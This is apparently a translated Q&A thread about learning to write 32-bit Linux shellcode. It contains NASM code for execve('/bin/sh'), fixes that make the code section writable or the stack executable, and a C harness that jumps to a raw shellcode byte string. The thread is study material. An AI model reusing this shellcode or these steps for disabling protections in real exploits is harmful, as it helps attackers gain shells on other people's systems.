我正在使用ubuntu 14.04,64bit。 我正在研究shellcode写作。因此,为了生成一个shell,我编写了以下程序
segment .text
global _start:
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax, eax
mov byte [esi + 7], al #here i get Error
lea ebx, [esi]
mov long [esi + 8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 80h
GotoCall:
call shellcode
Db '/bin/shJAAAABBBB'
已编译 - > nasm -ggdb -f elf Shellcode_Execve.asm
已关联 - > ld -m elf_i386 -ggdb -o Shellcode_Execve Shellcode_Execve.o
当我在GDB中运行它时,我在下面的指令中找到了我的错误,
mov byte [esi + 7], al
我发现,这是因为DEP(数据执行预防)。 所以我试过" -fno-stack-protector -z execstack"编译和链接如下,
$ nasm -ggdb -f elf32 -z execstack Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help
$ nasm -ggdb -f elf32 -z execstack -o shell Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help
$ nasm -ggdb -z execstack -f elf32 -o shell Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help
$ nasm -ggdb -fno-stack-protector -z execstack -z execstack -f elf32 -o shell Shellcode_Execve.asm
nasm: fatal: unrecognised output format `no-stack-protector' - use -hf for a list
type `nasm -h' for help
$ nasm -ggdb -f elf32 Shellcode_Execve.asm
$ gcc -ggdb -m32 -fno-stack-protector -z execstack -o Shellcode_Execve Shellcode_Execve.o
Shellcode_Execve.o:Shellcode_Execve.asm:5: multiple definition of `_start'
/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib32/crt1.o:(.text+0x0): first defined here
/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib32/crt1.o: In function `_start':
(.text+0x18): undefined reference to `main'
collect2: error: ld returned 1 exit status
$ nasm -ggdb -f elf32 Shellcode_Execve.asm
$ gcc -ggdb -m32 -fno-stack-protector -z execstack -o Shellcode_Execve Shellcode_Execve.o
$ ./Shellcode_Execve
Segmentation fault (core dumped)
$ nasm -ggdb -f elf32 Shellcode_Execve.asm
$ ld -m elf_i386 -ggdb -z execstack -o Shellcode_Execve Shellcode_Execve.o
$ ./Shellcode_Execve
Segmentation fault (core dumped)
如上所述,我尝试了使用GCC和ld禁用DEP的所有方法。 但没有任何作用。那我怎么能禁用DEP?并使我的代码工作? (请确保问题属于DEP)
答案 0 :(得分:4)
我已经改变了我的NASM代码,现在它看起来像下面,
section .mytext progbits alloc exec write align=16 ; CHANGED HERE
global _start:
_start:
jmp short GotoCall
shellcode:
pop esi
xor eax, eax
mov byte [esi + 7], al
lea ebx, [esi]
mov long [esi + 8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 80h
GotoCall:
call shellcode
Db '/bin/shJAAAABBBB'
默认情况下,.text部分不可写。刚刚将第一行改为
" section .mytext progbits alloc exec write align = 16"
for details about progbits alloc exec write,please click here.
链接器有一些默认覆盖,因此它会忽略可写的.text,即使你要求它。但如果它有不同的名称,它并不在乎。
现在编译并链接它,
nasm -f elf32 Shellcode_Execve.asm
ld -m elf_i386 -o Shellcode_Execve Shellcode_Execve.o
现在它工作:)
答案 1 :(得分:0)
我知道我已经很晚了,但我一直在与这个相同的代码和gcc堆栈保护作斗争。当用objdump -d将它变成shellcode时,我最终得到了:
char shellcode[]="\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
然后,在你的提示的帮助下,我能够编译并运行它:
〜/ Shellcode $ gcc -fno-stack-protector -z execstack execShellSpawn.c -o execShellSpawn
没有-z execstack我会得到一个Segfault。 如果没有-fno-stack-protector,它就会像exit(0)一样完成。